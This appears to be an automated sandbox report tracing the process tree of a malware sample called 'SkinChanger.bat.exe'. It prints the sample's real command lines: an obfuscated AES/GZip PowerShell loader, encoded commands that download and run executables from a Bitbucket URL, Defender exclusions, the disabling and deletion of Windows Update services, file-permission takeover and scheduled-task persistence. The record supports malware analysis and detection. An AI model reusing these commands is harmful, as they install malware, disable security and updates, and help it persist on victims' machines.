"SkinChanger.bat.exe" -noprofile -windowstyle hidden -ep bypass -command $yNMNp = [System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\SkinChanger.bat').Split([Environment]::NewLine);foreach ($DUpwR in $yNMNp) { if ($DUpwR.StartsWith(':: ')) { $zpFYG = $DUpwR.Substring(3); break; }; };$NDpIw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($zpFYG);$FglUn = New-Object System.Security.Cryptography.AesManaged;$FglUn.Mode = [System.Security.Cryptography.CipherMode]::CBC;$FglUn.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$FglUn.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Xe8pXJdA3AONCe1Zlyq3gqv0U2vVZ+ZFx6YQNe5/72I=');$FglUn.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('p6rOZj0Gc5fVio24RyZePg==');$tMNPD = $FglUn.CreateDecryptor();$NDpIw = $tMNPD.TransformFinalBlock($NDpIw, 0, $NDpIw.Length);$tMNPD.Dispose();$FglUn.Dispose();$duObo = New-Object System.IO.MemoryStream(, $NDpIw);$yiuvK = New-Object System.IO.MemoryStream;$VgABR = New-Object System.IO.Compression.GZipStream($duObo, [IO.Compression.CompressionMode]::Decompress);$VgABR.CopyTo($yiuvK);$VgABR.Dispose();$duObo.Dispose();$yiuvK.Dispose();$NDpIw = $yiuvK.ToArray();$DvMBT = [System.Reflection.Assembly]::('daoL'[-1..-4] -join '')($NDpIw);$pFgMM = $DvMBT.EntryPoint;$pFgMM.Invoke($null, (, [string[]] ('')))
2⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:996

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGsAdQB5ACMAPgBTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAAcABvAHcAZQByAHMAaABlAGwAbAAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIAAtAEEAcgBnAHUAbQBlAG4AdABMAGkAcwB0ACAAIgBBAGQAZAAtAFQAeQBwAGUAIAAtAEEAcwBzAGUAbQBiAGwAeQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsAPAAjAHAAcQBuACMAPgBbAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwAuAE0AZQBzAHMAYQBnAGUAQgBvAHgAXQA6ADoAUwBoAG8AdwAoACcATgBvACAAVgBNAHMAIAAvACAAVgBQAFMAIABhAGwAbABvAHcAZQBkACEAJwAsACcAJwAsACcATwBLACcALAAnAEUAcgByAG8AcgAnACkAPAAjAGYAegBpACMAPgA7ACIAOwA8ACMAcgBuAHkAIwA+ACAAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgADwAIwBmAGoAZwAjAD4AIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIABAACgAJABlAG4AdgA6AFUAcwBlAHIAUAByAG8AZgBpAGwAZQAsACQAZQBuAHYAOgBTAHkAcwB0AGUAbQBEAHIAaQB2AGUAKQAgADwAIwBsAHAAYwAjAD4AIAAtAEYAbwByAGMAZQAgADwAIwBrAHgAYwAjAD4AOwAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAJwBoAHQAdABwAHMAOgAvAC8AYgBpAHQAYgB1AGMAawBlAHQALgBvAHIAZwAvAGwAdQBjAGkAZgBlAHIAMQA3ADEANwAvAGcAcgBnAGUAcgBlAHIAZwByAGUAZwBnAC8AcgBhAHcALwA3ADQAZQBiADAAMwBmADcAYwA4ADQAOAAzADUAYwAyAGUAMQAyADUANgBiADQAYgA3ADgAMgA4ADUAOAA3AGMAYgA2ADgANwA1ADYAOAA1AC8AZABlAHYALgBlAHgAZQAnACwAIAA8ACMAZgBzAHgAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwBoAGQAZwAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAVABlAG0AcAAgADwAIwBhAG0AcgAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwAxAC4AZQB4AGUAJwApACkAPAAjAHgAawBmACMAPgA7ACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcABzADoALwAvAGIAaQB0AGIAdQBjAGsAZQB0AC4AbwByAGcALwBsAHUAYwBpAGYAZQByADEANwAxADcALwBnAHIAZwBlAHIAZQByAGcAcgBlAGcAZwAvAHIAYQB3AC8ANwA0AGUAYgAwADMAZgA3AGMAOAA0ADgAMwA1AGMAMgBlADEAMgA1ADYAYgA0AGIANwA4ADIAOAA1ADgANwBjAGIANgA4ADcANQA2ADgANQAvAGgAYQBmAHUAawAuAGUAeABlACcALAAgADwAIwB5AGsAdwAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAAPAAjAGwAYQBnACMAPgAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBUAGUAbQBwACAAPAAjAGcAcQBnACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnADIALgBlAHgAZQAnACkAKQA8ACMAYwBtAHEAIwA+ADsAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAJwBoAHQAdABwAHMAOgAvAC8AYgBpAHQAYgB1AGMAawBlAHQALgBvAHIAZwAvAGwAdQBjAGkAZgBlAHIAMQA3ADEANwAvAGcAcgBnAGUAcgBlAHIAZwByAGUAZwBnAC8AcgBhAHcALwA3ADQAZQBiADAAMwBmADcAYwA4ADQAOAAzADUAYwAyAGUAMQAyADUANgBiADQAYgA3ADgAMgA4ADUAOAA3AGMAYgA2ADgANwA1ADYAOAA1AC8AbgBvAGIAbwB5AC4AZQB4AGUAJwAsACAAPAAjAG4AZABrACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAA8ACMAdwB4AHcAIwA+ACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAagBuAGEAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAMwAuAGUAeABlACcAKQApADwAIwBqAGwAbgAjAD4AOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwB0AHMAdwAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAdABuAHoAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAMQAuAGUAeABlACcAKQA8ACMAeAB0AHcAIwA+ADsAIABTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAA8ACMAZABlAHIAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBUAGUAbQBwACAAPAAjAHUAZQBpACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnADIALgBlAHgAZQAnACkAPAAjAGoAdQByACMAPgA7ACAAUwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgAC0ARgBpAGwAZQBQAGEAdABoACAAPAAjAGYAaABoACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAVABlAG0AcAAgADwAIwBhAHcAZAAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwAzAC4AZQB4AGUAJwApADwAIwB6AHQAeAAjAD4A"
3⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3496

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-Type -AssemblyName System.Windows.Forms;<#pqn#>[System.Windows.Forms.MessageBox]::Show('No VMs / VPS allowed!','','OK','Error')<#fzi#>;
4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4056

C:\Users\Admin\AppData\Local\Temp\1.exe
"C:\Users\Admin\AppData\Local\Temp\1.exe"
4⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4088

C:\Users\Admin\AppData\Local\Temp\2.exe
"C:\Users\Admin\AppData\Local\Temp\2.exe"
4⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:4216

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG0AcQAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGcAbABvACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgADwAIwB3AGoAeAAjAD4AIABAACgAIAA8ACMAdwBxACMAPgAgACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAgADwAIwBpAG8AZAB5ACMAPgAgACQAZQBuAHYAOgBQAHIAbwBnAHIAYQBtAEYAaQBsAGUAcwApACAAPAAjAGgAYQBkAGcAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAdwBmAHcAIwA+AA=="
5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4672

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f & takeown /f %SystemRoot%\System32\WaaSMedicSvc.dll & icacls %SystemRoot%\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q & rename %SystemRoot%\System32\WaaSMedicSvc.dll WaaSMedicSvc_BAK.dll & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE
5⤵
- Suspicious use of WriteProcessMemory
PID:760

C:\Windows\system32\sc.exe
sc stop UsoSvc
6⤵
- Launches sc.exe
PID:4264

C:\Windows\system32\sc.exe
sc stop WaaSMedicSvc
6⤵
- Launches sc.exe
PID:4848

C:\Windows\system32\sc.exe
sc stop wuauserv
6⤵
- Launches sc.exe
PID:3792

C:\Windows\system32\sc.exe
sc stop bits
6⤵
- Launches sc.exe
PID:4100

C:\Windows\system32\sc.exe
sc stop dosvc
6⤵
- Launches sc.exe
PID:4148

C:\Windows\system32\reg.exe
reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f
6⤵
- Modifies registry key
PID:1796

C:\Windows\system32\reg.exe
reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f
6⤵
- Modifies registry key
PID:4336

C:\Windows\system32\reg.exe
reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f
6⤵
- Modifies security service
- Modifies registry key
PID:968

C:\Windows\system32\reg.exe
reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f
6⤵
- Modifies registry key
PID:1040

C:\Windows\system32\reg.exe
reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f
6⤵
- Modifies registry key
PID:2192

C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\WaaSMedicSvc.dll
6⤵
- Possible privilege escalation attempt
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:1744

C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q
6⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:1520

C:\Windows\system32\reg.exe
reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f
6⤵
- Modifies registry key
PID:656

C:\Windows\system32\reg.exe
reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f
6⤵
- Modifies registry key
PID:32

C:\Windows\system32\reg.exe
reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f
6⤵
- Modifies registry key
PID:1852

C:\Windows\system32\reg.exe
reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f
6⤵
- Modifies registry key
PID:4280

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE
6⤵
PID:4180

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE
6⤵
PID:2276

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE
6⤵
PID:3360

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE
6⤵
PID:2276

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE
6⤵
PID:5248

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE
6⤵
PID:5280

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE
6⤵
PID:5340

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
5⤵
- Suspicious use of WriteProcessMemory
PID:4528

C:\Windows\system32\powercfg.exe
powercfg /x -hibernate-timeout-ac 0
6⤵
- Suspicious use of AdjustPrivilegeToken
PID:4800

C:\Windows\system32\powercfg.exe
powercfg /x -hibernate-timeout-dc 0
6⤵
- Suspicious use of AdjustPrivilegeToken
PID:5012

C:\Windows\system32\powercfg.exe
powercfg /x -standby-timeout-ac 0
6⤵
- Suspicious use of AdjustPrivilegeToken
PID:3316

C:\Windows\system32\powercfg.exe
powercfg /x -standby-timeout-dc 0
6⤵
- Suspicious use of AdjustPrivilegeToken
PID:4980

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGMAegAjAD4AIABSAGUAZwBpAHMAdABlAHIALQBTAGMAaABlAGQAdQBsAGUAZABUAGEAcwBrACAALQBBAGMAdABpAG8AbgAgACgATgBlAHcALQBTAGMAaABlAGQAdQBsAGUAZABUAGEAcwBrAEEAYwB0AGkAbwBuACAALQBFAHgAZQBjAHUAdABlACAAJwAiAEMAOgBcAFAAcgBvAGcAcgBhAG0AIABGAGkAbABlAHMAXABHAG8AbwBnAGwAZQBcAEMAaAByAG8AbQBlAFwAdQBwAGQAYQB0AGUAcgBjAGgAcgAuAGUAeABlACIAJwApACAAPAAjAGgAdAB5AHYAIwA+ACAALQBUAHIAaQBnAGcAZQByACAAKABOAGUAdwAtAFMAYwBoAGUAZAB1AGwAZQBkAFQAYQBzAGsAVAByAGkAZwBnAGUAcgAgAC0AQQB0AFMAdABhAHIAdAB1AHAAKQAgADwAIwBzAGEAeAAjAD4AIAAtAFMAZQB0AHQAaQBuAGcAcwAgACgATgBlAHcALQBTAGMAaABlAGQAdQBsAGUAZABUAGEAcwBrAFMAZQB0AHQAaQBuAGcAcwBTAGUAdAAgAC0AQQBsAGwAbwB3AFMAdABhAHIAdABJAGYATwBuAEIAYQB0AHQAZQByAGkAZQBzACAALQBEAGkAcwBhAGwAbABvAHcASABhAHIAZABUAGUAcgBtAGkAbgBhAHQAZQAgAC0ARABvAG4AdABTAHQAbwBwAEkAZgBHAG8AaQBuAGcATwBuAEIAYQB0AHQAZQByAGkAZQBzACAALQBEAG8AbgB0AFMAdABvAHAATwBuAEkAZABsAGUARQBuAGQAIAAtAEUAeABlAGMAdQB0AGkAbwBuAFQAaQBtAGUATABpAG0AaQB0ACAAKABOAGUAdwAtAFQAaQBtAGUAUwBwAGEAbgAgAC0ARABhAHkAcwAgADEAMAAwADAAKQApACAAPAAjAGwAawAjAD4AIAAtAFQAYQBzAGsATgBhAG0AZQAgACcARwBvAG8AZwBsAGUAVQBwAGQAYQB0AGUAVABhAHMAawBNAGEAYwBoAGkAbgBlAEcATgBDACcAIAAtAFUAcwBlAHIAIAAnAFMAeQBzAHQAZQBtACcAIAAtAFIAdQBuAEwAZQB2AGUAbAAgACcASABpAGcAaABlAHMAdAAnACAALQBGAG8AcgBjAGUAIAA8ACMAYQBxACMAPgA7AA=="
5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4924

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c schtasks /run /tn "GoogleUpdateTaskMachineGNC"
5⤵
PID:3940

C:\Windows\system32\schtasks.exe
schtasks /run /tn "GoogleUpdateTaskMachineGNC"
6⤵
PID:356

C:\Users\Admin\AppData\Local\Temp\3.exe
"C:\Users\Admin\AppData\Local\Temp\3.exe"
4⤵
- Executes dropped EXE
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:4824

C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\comsavesbroker\4n37jNWytc0aB7dtWciFo5V7J2iV9.vbe"
5⤵
- Suspicious use of WriteProcessMemory
PID:3732

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\comsavesbroker\9vifgPznNWM81sSYpbQjkuUh7.bat" "
6⤵
- Suspicious use of WriteProcessMemory
PID:3260

C:\comsavesbroker\containersavesdhcp.exe
"C:\comsavesbroker\containersavesdhcp.exe"
7⤵
- Executes dropped EXE
- Drops file in Program Files directory
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4120

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:/'
8⤵
- Suspicious behavior: EnumeratesProcesses
PID:3716

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:/$Recycle.Bin/'
8⤵
- Suspicious behavior: EnumeratesProcesses
PID:4784

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:/comsavesbroker/'
8⤵
- Suspicious behavior: EnumeratesProcesses
PID:3588

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Documents and Settings/'
8⤵
- Suspicious behavior: EnumeratesProcesses
PID:3196

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files/'
8⤵
- Suspicious behavior: EnumeratesProcesses
PID:4208

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:/PerfLogs/'
8⤵
- Suspicious behavior: EnumeratesProcesses
PID:4020

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:/odt/'
8⤵
- Suspicious behavior: EnumeratesProcesses
PID:4224

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:/ProgramData/'
8⤵
- Suspicious behavior: EnumeratesProcesses
PID:4148

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Recovery/'
8⤵
- Suspicious behavior: EnumeratesProcesses
PID:4640

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:/System Volume Information/'
8⤵
- Suspicious behavior: EnumeratesProcesses
PID:5032

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Users/'
8⤵
- Suspicious behavior: EnumeratesProcesses
PID:196

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Windows/'
8⤵
- Suspicious behavior: EnumeratesProcesses
PID:4980

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files (x86)/'
8⤵
- Suspicious behavior: EnumeratesProcesses
PID:1356

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\E2FgvhS1mJ.bat"
8⤵
PID:4728

C:\Windows\system32\w32tm.exe
w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
9⤵
PID:524

C:\Users\Public\AccountPictures\Idle.exe
"C:\Users\Public\AccountPictures\Idle.exe"
9⤵
- Executes dropped EXE
- Modifies registry class
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of SetWindowsHookEx
PID:4856

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\6f2030ac-db5a-414d-929b-196439ee9a04.vbs"
10⤵
PID:3212

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\d41e02de-fb9b-4935-b407-56b01f0d829d.vbs"
10⤵
PID:4804

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c choice /c y /n /d y /t 1 & attrib -h -s "C:\Users\Admin\AppData\Local\Temp\SkinChanger.bat.exe" & del "C:\Users\Admin\AppData\Local\Temp\SkinChanger.bat.exe"
3⤵
- Suspicious use of WriteProcessMemory
PID:1396

C:\Windows\system32\choice.exe
choice /c y /n /d y /t 1
4⤵
PID:4140

C:\Windows\system32\attrib.exe
attrib -h -s "C:\Users\Admin\AppData\Local\Temp\SkinChanger.bat.exe"
4⤵
- Views/modifies file attributes
PID:1712

C:\Program Files\Google\Chrome\updaterchr.exe
"C:\Program Files\Google\Chrome\updaterchr.exe"
1⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Drops file in Program Files directory
- Modifies data under HKEY_USERS
PID:1640

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG0AcQAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGcAbABvACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgADwAIwB3AGoAeAAjAD4AIABAACgAIAA8ACMAdwBxACMAPgAgACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAgADwAIwBpAG8AZAB5ACMAPgAgACQAZQBuAHYAOgBQAHIAbwBnAHIAYQBtAEYAaQBsAGUAcwApACAAPAAjAGgAYQBkAGcAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAdwBmAHcAIwA+AA=="
2⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
PID:3492

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f & takeown /f %SystemRoot%\System32\WaaSMedicSvc.dll & icacls %SystemRoot%\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q & rename %SystemRoot%\System32\WaaSMedicSvc.dll WaaSMedicSvc_BAK.dll & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE
2⤵
PID:752

C:\Windows\system32\sc.exe
sc stop UsoSvc
3⤵
- Launches sc.exe
PID:4616

C:\Windows\system32\sc.exe
sc stop WaaSMedicSvc
3⤵
- Launches sc.exe
PID:5028

C:\Windows\system32\sc.exe
sc stop wuauserv
3⤵
- Launches sc.exe
PID:1748

C:\Windows\system32\sc.exe
sc stop bits
3⤵
- Launches sc.exe
PID:4132

C:\Windows\system32\sc.exe
sc stop dosvc
3⤵
- Launches sc.exe
PID:4712

C:\Windows\system32\reg.exe
reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f
3⤵
- Modifies registry key
PID:2340

C:\Windows\system32\reg.exe
reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f
3⤵
- Modifies registry key
PID:1008

C:\Windows\system32\reg.exe
reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f
3⤵
- Modifies registry key
PID:4852

C:\Windows\system32\reg.exe
reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f
3⤵
- Modifies registry key
PID:3388

C:\Windows\system32\reg.exe
reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f
3⤵
- Modifies registry key
PID:4300

C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\WaaSMedicSvc.dll
3⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:5444

C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q
3⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:4256

C:\Windows\system32\reg.exe
